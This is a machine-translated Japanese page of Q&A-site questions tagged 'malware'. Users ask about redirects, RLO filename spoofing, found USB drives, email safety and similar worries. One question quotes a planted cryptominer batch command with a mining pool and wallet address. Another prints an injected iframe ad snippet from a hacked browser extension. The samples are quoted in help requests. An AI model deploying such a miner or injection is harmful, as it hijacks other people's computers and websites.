タグ付けされた質問 「malware」

私が直面している状況は、次のような立場の家族です。 動作するものを更新したくありません。更新すると何かが壊れる可能性があります。Windows 98を実行する古いコンピューターを見てください。私は15年間、毎日すべてを使用しており、ウイルス対策などは一切ありませんが、問題なく動作します。 同じ推論を使用して、彼はWindows XPを実行している他のコンピューターに更新プログラムまたはサービスパックをインストールすることを強く抵抗しました。 深刻なお金のために彼のコンピューターのためにいくつかのWindows 7を購入する、または Linuxに切り替え、基本的にコンピューターを最初から使用する方法を再学習しました。 コンピューターがマルウェアに感染していると、たとえ何も悪いことに気づかなくても悪いことを伝えるために、どのような事実を使用できますか？

25 security  malware 

ドキュメントやプログラムなどの任意のデータを、PNG画像などの画像ファイルの形式で保存することは可能ですか？私の懸念は、誰かがマルウェアが使用するデータを画像にエンコードし、Flickrのようなサイトにアップロードできることです。

25 security  images  malware  png 

別の投稿の回答によると、 Windows XPの更新プログラムを受け取るべきではありませんでした。 しかし、私はアップデートを受け取っています： これは、私のシステムがバグや侵害を受けていることを示していますか（悪意のあるプログラムが私をだまして、ソフトウェアをダウンロードする[ダウンロード]をクリックさせようとしている）。

24 windows-xp  windows-update  malware 

マルウェアに感染したようです。具体的には、時々（通常は数日に1回）何か、通常は「新しいバージョンのFlash」をダウンロードするように要求するページにリダイレクトされます。おそらく、それはこの種のものではありませんが、実際には何らかのウイルスまたはトロイの木馬です。 google-chromeDebian Linuxでバージョン30.0.1599.114 を使用していますが、これは拡張機能が原因であると確信しています。拡張機能を単にアンインストールしたり、~/.config/google-chromeフォルダーを削除したりすることはできますが、それは避けたいと思います。これを引き起こしている拡張子を特定し、それだけを削除したいと思います。 これをデバッグする際に（@Braiamに感謝）、イベントロガーをチェックインし、chrome://net-internals/#eventsリダイレクト先のURLの1つを検索しました。 内容は次のchrome://net-internals/#eventsとおりです。 122667: URL_REQUEST http://cdn.adnxs.com/p/d9/32/a3/72/d932a372371bd0a47ba7e2a73649a8d0.swf?clickTag=http%3A%2F%2Ffra1.ib.adnxs.com%2Fclick%3FSRPvAE9aoD_c-TxO6i6ZP-kmMQisHO4_3Pk8TuoumT9JE-8AT1qgP3vmRkLiiPF6ljpJTzhxcH-5rRRTAAAAABwgIwByBwAAPwEAAAIAAADRAMMAVqgFAAAAAQBVU0QAVVNEANgCWgDHsgAAFIsAAQUCAQIAAIwAeiTtsAAAAAA.%2Fcnd%3D%2521NgbzOgjzkMEBENGBjAYY1tAWIAA.%2Freferrer%3Dhttp%253A%252F%252Ffra1.ib.adnxs.com%252Fif%253Fenc%253DgbdAguLHaD8eqb7zixJkP_LSTWIQWOk_Hqm-84sSZD-At0CC4sdoP2mCZbZYUNUFljpJTzhxcH-3rRRTAAAAAJL-IgB2AgAAUAMAAAIAAAA9ocQAN0sEAAAAAQBVU0QAVVNEANgCWgD8ogAA58sAAgUCAQIAAIwA9idtvAAAAAA.%2Fclickenc%3Dhttp%253A%252F%252Ffra1.ib.adnxs.com%252Fclick%253FXkiHhzB-Wj-D_TJz3IRWP3E9CtejcNU_g_0yc9yEVj9eSIeHMH5aP_ygL0YyHDQoljpJTzhxcH-2rRRTAAAAAEJLIQBJAQAAVwMAAAIAAACL0cUA0WAFAAAAAQBVU0QAVVNEANgCWgDQMgAAUdQDAQUCAQIAAIwA3yN4YgAAAAA.%252Fcnd%253D%25218gXSNwiT18QBEIujlwYY0cEVIAA.%252Freferrer%253Dhttp%253A%252F%252Fwww.imgclck.com%252Fserve%252Fimgclck.php%252Fclickenc%253Dhttp%253A%252F%252Foptimized-by.rubiconproject.com%252Ft%252F9164%252F15602%252F101258-2.3581666.3755480%253Furl%253Dhttp%25253A%25252F%25252Fwww.downloadchop.com%25252Fgo%25252Flightspark%25253Fsource%25253Dybrant_lightspark-fr%252526adprovider%25253Dybrant%252526ce_cid%25253Dfra1CJb1pPqEp5y4fxACGPvMm5KknOL4eiINODIuMjI5LjIyLjE2NigBMLnb0pgF%252526subid%25253D2301980 Start Time: 2014-03-03 17:28:41.358 t=1393864121358 [st= 0] +REQUEST_ALIVE [dt=334] t=1393864121359 [st= 1] +URL_REQUEST_START_JOB [dt=332] --> load_flags = 134349184 (ENABLE_LOAD_TIMING | ENABLE_UPLOAD_PROGRESS | MAYBE_USER_GESTURE | VERIFY_EV_CERT) --> method = "GET" --> priority = 2 --> url = "http://cdn.adnxs.com/p/d9/32/a3/72/d932a372371bd0a47ba7e2a73649a8d0.swf?clickTag=http%3A%2F%2Ffra1.ib.adnxs.com%2Fclick%3FSRPvAE9aoD_c-TxO6i6ZP-kmMQisHO4_3Pk8TuoumT9JE-8AT1qgP3vmRkLiiPF6ljpJTzhxcH-5rRRTAAAAABwgIwByBwAAPwEAAAIAAADRAMMAVqgFAAAAAQBVU0QAVVNEANgCWgDHsgAAFIsAAQUCAQIAAIwAeiTtsAAAAAA.%2Fcnd%3D%2521NgbzOgjzkMEBENGBjAYY1tAWIAA.%2Freferrer%3Dhttp%253A%252F%252Ffra1.ib.adnxs.com%252Fif%253Fenc%253DgbdAguLHaD8eqb7zixJkP_LSTWIQWOk_Hqm-84sSZD-At0CC4sdoP2mCZbZYUNUFljpJTzhxcH-3rRRTAAAAAJL-IgB2AgAAUAMAAAIAAAA9ocQAN0sEAAAAAQBVU0QAVVNEANgCWgD8ogAA58sAAgUCAQIAAIwA9idtvAAAAAA.%2Fclickenc%3Dhttp%253A%252F%252Ffra1.ib.adnxs.com%252Fclick%253FXkiHhzB-Wj-D_TJz3IRWP3E9CtejcNU_g_0yc9yEVj9eSIeHMH5aP_ygL0YyHDQoljpJTzhxcH-2rRRTAAAAAEJLIQBJAQAAVwMAAAIAAACL0cUA0WAFAAAAAQBVU0QAVVNEANgCWgDQMgAAUdQDAQUCAQIAAIwA3yN4YgAAAAA.%252Fcnd%253D%25218gXSNwiT18QBEIujlwYY0cEVIAA.%252Freferrer%253Dhttp%253A%252F%252Fwww.imgclck.com%252Fserve%252Fimgclck.php%252Fclickenc%253Dhttp%253A%252F%252Foptimized-by.rubiconproject.com%252Ft%252F9164%252F15602%252F101258-2.3581666.3755480%253Furl%253Dhttp%25253A%25252F%25252Fwww.downloadchop.com%25252Fgo%25252Flightspark%25253Fsource%25253Dybrant_lightspark-fr%252526adprovider%25253Dybrant%252526ce_cid%25253Dfra1CJb1pPqEp5y4fxACGPvMm5KknOL4eiINODIuMjI5LjIyLjE2NigBMLnb0pgF%252526subid%25253D2301980" t=1393864121359 [st= 1] HTTP_CACHE_GET_BACKEND …

21 linux  google-chrome  malware 

名前にRLO（Right-to-Left Override）Unicode文字が含まれるファイル（ファイル名を偽装するマルウェア手法）がWindows PCで書き込まれたり読み取られたりすることを回避または防止する方法は何ですか？ RLO Unicode文字の詳細はこちら： Unicode文字「右から左に上書き」（U + 202E） 双方向テキスト マルウェアによって使用されるRLOユニコード文字に関する情報： 情報技術振興機構（IPA）がまとめた2011年10月のコンピューターウイルス/不正コンピューターアクセスインシデントレポートの概要 [ ミラー（Googleキャッシュ） ] このRLOキャラクターテストWebページを試して、RLOキャラクターの動作を確認できます。 RLO文字は、そのWebページの「入力テスト」フィールドにも既に貼り付けられています。そこに入力してみて、入力している文字が逆順（左から右ではなく右から左）で出ていることに注意してください。 ファイル名では、RLO文字をファイル名に明確に配置して、実際のファイル名またはファイル拡張子とは異なるファイル名またはファイル拡張子を持つようになりすましまたは偽装することができます。（「既知のファイルタイプの拡張子を非表示にする」をオフにしても、非表示のままになります。） RLO文字を含むファイルが実行されないようにする方法に関する情報がある唯一の情報は、情報技術振興機構のWebサイトからです。 名前にRLO文字が含まれるファイルがコンピューターに書き込まれたり読み取られたりするのを防ぐ他の良い解決策、またはRLO文字が含まれるファイルが検出された場合にユーザーに警告する方法を推奨できますか？ 私のOSはWindows 7ですが、Windows XP、Vista、および7のソリューション、またはこれらのOSを使用する人々を支援するすべてのOSで機能するソリューションを探しています。

20 windows  security  virus  malware  unicode 

現在のところ、この質問はQ＆A形式には適していません。回答は、事実、参考文献、または専門知識によってサポートされると予想されますが、この質問は、議論、議論、世論調査、または広範な議論を求める可能性があります。この質問を改善し、場合によっては再開できると思われる場合は、ヘルプセンターをご覧ください。 7年前に閉鎖されました。 私は Linuxでアンチウイルスを実行していません（私は知らないほとんどの人）し、マルウェアやスパイウェア、またはother_bad_wareの形式についてはまったく心配していません。 心配する必要がありますか？ もちろん、ルートとしては実行しません。

20 linux  security  anti-virus  malware 

この質問にはすでに回答があります： 職場の駐車場にあるUSBスティックを安全に調査するにはどうすればよいですか？ （7つの答え） 2年前に閉店しました。 路上でusbドライブを見つけ、ソフトウェアやハードウェアの変更（コンポーネントの追加や変更など）によって改ざんされていないことを100％確認したいとします。マルウェア。 マルウェアが完全に残っていないことを確実にするために、完全にフォーマットされていますか？もしそうなら、Tails 3.2のDisk Utilityからの標準の遅いプロセスで完全にフォーマットするのに十分ですか？ 攻撃者から可能な限り最高の技術的能力を想定します。合理的または妥当なシナリオだけではありません。

18 usb  security  usb-flash-drive  malware  malware-removal 

私はオンラインで見回しましたが、Javaの新しいヘルパーツールが何であるかについてそれほど多くの情報を見つけることができないようです。SEで別のスレッドを見つけました が、あまり説明していません。ブロートウェアを提供し、それらをダウンロードさせようとするものですか？ Javaを更新していたので、管理者アカウントでサインインしてJavaの新しいヘルパーツールをインストールするように促されました。他の誰かがこの問題に遭遇しましたか？もしそうなら、あなたはそれをアンインストールする方法を見つけましたか、それともあなたのマシンにそれを保持しましたか。

18 mac  java  malware  adware 

奇妙なバナーが表示されたときにサイトを開発していました。最初は自分のせいだと思っていましたが、ウェブホストプロバイダーのせいだと思っていましたが、今はどこから来たのかわかりません。 見た目が悪く、アクセスするすべてのページに影響することはわかっています。StackOverflowのフッターがどのように見えるかを見てください。 コード自体は「ページのソースを表示」には表示されませんが、「Inspect要素」から表示してレンダリングされたhtmlを表示すると表示されます。さらにdivがありますが、それらのいくつかは空です。ここには多くの外国のコードがあります。主なものは次のとおりです。 <div id="op_ad"> <br> <center> <iframe src="http://www.games-free-apps.com/games/b.html" style="border:none;width:310px;height:255px;overflow:hidden;" frameborder="0" marginheight="0" marginwidth="0"> <!-- MORE CODE HERE --> </iframe> </center> </div> そして今度は私のウェブサイトからの侵入コードのより詳細なスクリーンショット： だから、これはChromeのバグ、私が何らかの形で壊したもの（これらのコードの断片を見たことがない）またはマルウェアですか？どのように修正できますか？ UbuntuでGoogle Chromeバージョン21.0.1180.89を使用しています（公式ページからのネイティブ）。 編集：wikiの回答を開始しました。ハッキングされた拡張機能をリストに追加してください。Googleにメールを送信して通知するつもりですが、既に気付いているかもしれません。

18 google-chrome  malware 

今日、システムの動作が遅いことに気づき、予防措置としてターミナルのシステムユーザーのリストを確認しました。認識できないユーザーをいくつか見つけました。心配する必要がありますか？ _applepay _captiveagent _ctkd _datadetectors _findmydevice _gamecontrollerd _hidd _mbsetupuser _mobileasset _ondemand _pcastagent _pcastlibrary _pcastserver _wwwproxy _xgridagent _xgridcontroller _xserverdocs

18 macos  mac  malware  macos-sierra 

scvhost.batという名前のこの.batファイルを見つけました。ファイルにはこのコンテンツが含まれていました： scvhost -a cryptonight -o stratum+tcp://xmr-eu.dwarfpool.com:8005 -u 48uh2mrdkdq2tQysfkX2hZDi2hkRua4GX13EqY8djJ5xNXhez7baztVWbwXa34vUMveKAzAiA4j8xgUi29TpKXpm42jqV6H.microSf -p MXXXXXX-t 02 これはウイルス（情報を盗むなど）か、植え付けられた鉱夫ですか？私も暗号通貨に手を出しstratum、上記のファイルに記載されている通貨であるため、私は心配しています。

17 windows  batch-file  malware  cryptomining 

Windows 10をインストールし、ブロートウェアを削除しています。 Intel Security Assistは何をし、なぜインストールされているのですか？また、（どのように）IMEに関連するのか、OSへのバックドアの提供を提供/促進すると信じるのは合理的です。（ほぼ1年たっても、Googleでそれに関する有意義な情報を見つけることができませんでした） 更新 -この質問は26000回以上表示されており、探しても意味のある答えがない場合の最初の結果の1つであるため、報奨金を追加しています。 古いアップデート -IMEプラットフォームの一部を確認するための回答がいくつかありましたが、これはプログラムの利点/ユーティリティが何であるかを説明しています（特にユーザーにとって）。

16 security  malware 

何らかの形のスパムであると非常に疑われるメールを受け取ったとしても、100％確信はありません。また、優れたスパムフィルターを備えたフォーム（Gmailなど）を使用していると仮定しますが、このメッセージは安全に送信されました。 明らかに、添付ファイルを開くべきではありませんが、この電子メールは安全に開くことができますか？そうでない場合、それを安全に開く簡単な方法はありますか？

14 security  email  gmail  malware  webmail 

簡単な質問：銀行のパスワード、クレジットカード番号などを入力するとき、マルウェアを防ぐためにスクリーンキーボードを使用します。これは良いアイデアですか、時間を無駄にしているのですか？一部のインターネットバンキングWebサイトには、パスワードを入力するためのオンスクリーンキーボードがありますが、これらはより安全ですか？

14 security  keyboard  malware 

ほとんどのメールクライアントは、デフォルトではメールのコンテンツに画像を表示しません。 しかし、私はまだこれを理解していません。画像ジョブの表示はどのようにコンピューターを攻撃できますか？

14 security  email  images  virus  malware